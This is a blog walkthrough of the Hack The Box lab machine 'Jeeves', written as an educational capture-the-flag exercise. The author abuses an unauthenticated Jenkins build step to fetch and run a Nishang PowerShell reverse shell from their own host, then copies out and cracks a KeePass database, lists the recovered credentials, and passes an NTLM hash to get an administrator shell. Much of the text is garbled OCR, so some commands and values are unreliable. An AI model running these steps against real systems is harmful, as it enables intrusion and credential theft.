jeeves – hyd3sec's Blog

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005
May 26 2009 14:24:20
Copyright (c) 1988-2005 Microsoft Corporation
standard Edition on Windows NT 5.0 (Build 2195: service Pack 4)
' to data type int.
- 9.00.4053.00 (Intel X86)
Description: An ocwrred during the of the web rewest. review the suck trace for information the error and o@inated wd e.
Exception Details: System DataSqICIient-SØException: Cmversion füd when the nvarchar value 'Microsoft SQL Server 2Ø5 - 9.00-4053.00 X86)
May 26 2009
Copyr•t (c) 19"-2005 Microwtt Corporation
Edition on Windows NT 5.0 (Build 2195: Service 4)
• to data type int.
Error:

But weird thing is… it’s a fake image. So this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63
Host is up, received user-set (ø.ø44s latency).
scanned at 2020-05-27 16:17:20 EDT for 192s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT
8Ø/tcp
STATE SERVICE
open http
REASON
VERSION
syn-ack tt1 127 Microsoft IIS httpd 10.0
I http-methods:
I supported Methods: OPTIONS TRACE GET HEAD POST
Potentially risky methods: TRACE
l_http-server-header: Microsoft-IIS/1ø.ø
I _http-title: Ask Jeeves
135/tcp
open msrpc
syn-ack tt1 127 Microsoft Windows RPC
10 microsoft-ds (workgroup: WORKGROUP)
445/tcp
open microsoft-ds syn-ack ttI 127 Microsoft Windows 7 -
5ØØØØ/tcp open http
syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT
l_http-server-header: Jetty(9.4.z-SNAPSHOT)
I _http-title: Error Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008 (88%)
OS CPE: cpe: /o:microsoft : r2
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
OPS(OI

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kalijhyd3 . —/TooIs/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbus
ter/directory-1ist-2.3-medium.txt -
-hc http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing S
SL sites. Check Wfuzz's documentation for more information.
* Wfuzz 2.4.5 -
The Web Fuzzer
Target: http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ
Total requests: 220560
ID
øøøø41607 :
000048313 :
Finishing
Response
302
pending
Lines
11 L
Word
26 w
Chars
Ch
318 Ch
Payload
" askj eeves "
"bt3"
requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

Jenkins
Jenkins
New Item
People
Build History
Manage Jenkins
Credentials
Build Queue
No builds in the queue.
Build Executor Status
1 Idle
2 Idle
log in
AUTO REFRESH
gadd description
All
s
0
Icon:
w
Name
da nci n2020
Last Success
7 hr56 min - #10
7 hr28 min - #1
Last Failure
7 hr25 min - #16
WA
RSS for all
Last Duration
2.3 sec
2.6 sec
RSS for failures RSS for iust latest builds

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

e Jenkins
Jenkins
Enter an item name
pngmel
Required field
Freestyle project
This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for
something other than software build.
Pipeline
Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or
organizing complex activities that do not easily fit in free-style job type.
Multi-configuration project
Suitable for projects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc.
Folder
Creates a container that stores nested items in it Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate
namespace, so you can have multiple things of the same name as long as they are in different folders.
GitHub Organization
Scans a GitHub organization (or user account) for all repositories matching some defined markers.
Multibranch Pipeline
Creates a set of Pipeline projects according to detected branches in one SCM repository.
create a new item from other existing, you can use this option:
Type to autocomplete
log in

Now clicking around and scrolling down… we see something very interesting:

Jenkins
pi ngme
General
Source Code Management
Build Triggers
Build Environment
Build
Post-build Actions
Build periodically
GitHub hook trigger for GITScm polling
Poll SCM
Build Environment
Delete workspace before build starts
Abort the build if it's stuck
Add timestamps to the Console Output
Use secret text(s) or file(s)
With Ant
Build
Add build step
Execute Windows batch command
Execute shell
Invoke Ant
Invoke Gradle script
Invoke top-level Maven targets
Run with timeout
Set build status to -pending" on GitHub commit
Page generated: May 28, 2020 224-53 PM EDT
REST API
Jenkins ver. 2.87

This looks like a clear path to RCE. Let’s test it out:

Build
Execute Windows batch command
Command
ping 1€.1€.14.3€
See the list of available environment variables
Add build step
Post-build Actions
Add post-build action
Apply
Advancedm

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

Build Now
Delete Project
Configure
Build History
find
May 28, 2020 226 PM
trend —

Running tcpdump on my box, I see the ICMP requests coming through:

kaliö)hyd3 . "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ sudo tcpdump -i tunø
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tunø, link-type RAW (Raw IP), capture size 262144 bytes
IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags seq 984844400:984845062, ack 30
63434529, win 501, options [nop, nop,TS val 1480055907 ecr 40178073], length 662
•24.973560 IP 10.10.10.63.5øøøø > hyd3.5Ø664: Flags seq 1:206, ack 662, win 254, op
09:22.
tions
[nop, nop,TS val 40181743 ecr 1480055907], length 205
•24.973596 IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags [ . ] , ack 206, win 501, options [nop,n
09:22.
val 1480055951 ecr 40181743], length
op , TS
•25 . 043798 IP 10.10.1Ø.63 > hyd3: ICMP echo request, id 1, seq 5, length
09:22.
•25.043814 IP hyd3 > 10.1Ø.1Ø.63: ICMP echo reply, id 1, seq 5, length
09:22.
•26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6, length
09:22.
•26. 061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6, length
09:22.
•26.312795 IP hyd3.5Ø661+ > 10.10.10.63.5øøøø: Flags [P.], seq 662:1331, ack 206, win 501,
09:22.
options [nop, nop,TS val 1480057290 ecr 40181743], length 669
IP 10.10.1ø.63.5øøøø > hyd3.5Ø664: Flags [P.], seq 206:1161, ack 1331, win 252
, options [nop, nop,TS val 40183134 ecr 1480057290], length 955
IP hyd3.5Ø661+ > 10.10.1Ø.63.5ØØØØ: Flags
nop,TS val 1480057342 ecr 40183134], length
IP 10.10.10.63 > hyd3:
IP hyd3 > 10.10.10.63:
IP 10.10.10.63 > hyd3:
IP hyd3 > 10.10.10.63:
ICMP
ICMP
ICMP
ICMP
echo
echo
echo
echo
request, id
reply, id 1,
request, id
reply, id 1,
ack 1161, win 501, options [nop,
1, seq 7, length
seq 7, length
1, seq 8, length
seq 8, length

Now it’s as simple as creating a reverse powershell script with Nishang and appending the bottom with a callback to our box:

catch
Write-warning
"Something went wrong! Check if the server is reachable and you are usin
g the correct port."
Write-Error $_
128, 63
Invoke-PowerSheIITcp -Reverse
-IPAddress 10.10.14.30
-Port
Bot

Serve up the PowerShell script:

kaliöhyd3 . "Documents/htb/jeeves$ python -m
Serving HTTP on ø.ø.ø.ø port 8000 (http://ø.
- [28/May/2Ø2Ø 09 : 36: 12] "GET
10.10.10.63 -
http.server
ø.ø.ø:8øøø/) .
/ Invoke-PowerShe11Tcp.ps1 HTTP/I.I"
200 -

Modify the build request:

Build
Execute Windows batch command
Command
IEX(New-Object Net .WebClient) .downloadString( 'http://l€ . 16 . 14.36 : 8€0€/Invoke-
PowerShellTcp . PSI
See the list of available environment variables
Add build s tep

Once you trigger it, you should receive a callback on your listener:

kaliö)hyd3 . —/Documents/htb/jeeves$ rlwrap nc -nvlp
listening on [any]
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688
Windows PowerSheII running as user kohsuke on JEEVES
Copyright (C) 2015 Microsoft Corporation. All rights reserved .
PS C:
j eeves\kohsuke
PS C: hostname
Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well

Some simple enumeration showed an interesting file: CEH.kdbx

Directory
05/28/2020
05/28/2020
09/18/2017
of C:
02:42 PM
02:42 PM
01:43 PM
2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kaliö)hyd3: "Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/exampIes/sm
bserver. py hyd3 /home/kaIi/Documents/htb/jeeves/smb
Impacket vø.9.21 - Copyright 2020 SecureAuth Corporation
Config file parsed
Callback added for UUID 4B324FC8-167ø-01D3-1278-5A47BF6EE188 V:3.Ø
Callback added for UUID 6BFFDø98-A112-361ø-9833-46C3F87E345A v:l.ø
Config file parsed
Config file parsed
Config file parsed

Create the folder on the victim box and navigate to it:

Ips C.
• New-PSDrive -Name
0.14.
Name
hyd3
"hyd3"
-PSProvider
"FileSystem"
-Root
3Ø\hyd3"
Used (GB)
CurrentLocation
Free (GB) Provider
FileSystem
Root

Copy the file over

Now looking at the file and running file on it, you know it’s a keypass file. Crack it with hashcat. In order to do this first you need to extract the hash with keepass2john:

kaliöhyd3 . —/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh .hash
kaliöhyd3 . —"Documents/htb/ jeeves/smb$ cat ceh . hash
CEH :
3766b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fcff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b
68254db431a21ec33298b612fe647db48
kaliö)hyd3 . •-/Documents/htb/jeeves/smb$ vi ceh .hash

Locate the mode (-m) for hashcat for this hash format:

Hashcat is not expecting the CEH: file name before the hash, so edit that and then run hashcat with rockyou.txt

kaliöhyd3 . —/Documents/htb/jeeves/smb$ vi ceh .hash
kaliöhyd3 . •-/Documents/htb/jeeves/smb$ cat ceh .hash
b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b6825
4db431a21ec33298b612fe647db48

kaliöhyd3 . "Documents/htb/jeeves/smb$ hashcat
txt ceh .hash
hashcat (v5.1.ø) starting...
OpenCL Platform #1: The pocu project
-m 13400
-w 1 /usr/share/wordlists/rockyou .
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable,
Counted lines in /usr/share/wordlists/rockyou . txt... Insufficient memory available
Insufficient memory available
Segmentation fault
4MCU

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kalijhyd3 : "Documents/htb/jeeves/smb$ hashcat
you . txt
hashcat (v5.1.ø) starting...
OpenCL Platform #1: The pocu project
-m 13400
-a ceh .hash /usr/share/wordlists/rock
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable,
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
Minimum password length supported by kernel:
Maximum password length supported by kernel: 256
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled .
* Device #1: build_opts
' -cm-std=CL1.2 -I OpenCL -I
-D VENDOR ID-64 -D CUDA ARCH=ø -D AMD ROCM=ø -D
-D DGST RI-I -D DGST R2=2 -D DGST R3=3 -D DGST ELEM=I+ -D KERN TYPE=134øø -D unroll '
* Device #1: Kernel m134øø-pure.ce8862df .kernel not
4MCU
/usr/share/hashcat/OpenCL -D LOCAL_MEM_TYP
VECT SIZE-8 -D DEVICE TYPE-2 -D DGST RO=ø
found in cache! Building may take a while.

b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØft66ØfCfft4f1CC89f728b6825
4db431a21ec33298b612fe647db48 : moonshinel
Sesslon.....
hashcat
Status....
Cracked
Hash . Type. KeePass 1 (AES/Twofish) and KeePass 2 (AES)
Hash . Target....
Time Started
Thu May 28 2020 (31 secs)
Time. Estimated... :
Thu May 28 2020 (0 secs)
File (/usr/share/wordlists/rockyou . txt)
Guess .Base.......:
1/1 (løø.øø%)
Guess .Queue......
Speed
Recovered........
Progress..........
Rejected...
Restore.point....:
Restore. Sub .#1...:
Candidates .#1....
Started: Thu May
Stopped: Thu May
. .47db48
1760 H/s (12.21ms) Accel:512 Loops:64 Thr:l vec:8
1/1 (løø.øø%) Digests, 1/1 (løø.øø%) Salts
55296/14344385 (0.39%)
0/55296 (ø.øø%)
53248/14344385 (0.37%)
Salt:Ø Amplifier: 0-1 Iteration: 5952-6000
soydivina
28
28
grad2ø1ø
2020
2020

So we found that the password for the file is moonshine1

Looking through everything in the kdbx file, we find:

CEH.kdbx [read-only]
Groups View Tools Help
- KeePassX
Database Entries
CEH
General
Windows
Network
Internet
a eMai1
Homebanking
Backup stuff
Bankof America
p DC Recovery PW
P EC-Counci1
It's a secret
Jenkins admin
Keys to the king...
Walmart.com
Username
Michae1321
administrator
hackerman123
admin
admin
bob
anonymous
URL
https://www.bankofamerica.com
https://www.eccouncil.org/progra...
http://localhost:8180/secret.jsp
http://localhost:8080
http://www.walmart.com

Taking note of all our credentials found

backups tuff : aad3b435b51404eeaad3b435b51404ee : eØfb1 fb85756c24235ff238cbe81 feøø
Michae1321: 12345
administrator : SITjAtJHKsugh90C4VZ1
hackerman123 : pwndyouall !
admin : F7WhTrSFDKB6sxHU1 cun
b0b: ICEUnYPjNf1uPZSzOySA
anonymous : password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that first line is a hash, so I attempted to pass the hash… and returned a system shell

kaliö)hyd3 . •-/Documents/htb/ jeeves/smb$ pth-winexe -U administrator%aad3b435b51W4eeaad3b435b514
04ee: eøfb1fb85756c24235ff238cbe81feøø // 10.10.10.63 cmd . exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved .
C: \Windows
whoami
jeeves\administrator
C: \Windows
hostname
Jeeves

Grabbing the user and root flags:

C: Administrator
cd Administrator
C: Desktop
cd Desktop
C: \Users
dir
Volume in drive C has no label.
Volume Serial Number is BE5ø-BIC9
Directory
11/08/2017
11/08/2017
12/24/2017
11/08/2017
of C:
10:05 AM
10:05 AM
03:51 AM
10:05 AM
2 File(s)
2 Dir(s)
36 hm. txt
797 Windows 10 Update Assistant.lnk
833 bytes
7 bytes free
C: \Users
cd
'cd' is not recognized as an internal or external comand,
operable program or batch file.
C: hm. txt
type hm.txt
The flag is elsewhere.
Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:

Tag: jeeves

Jeeves – No Metasploit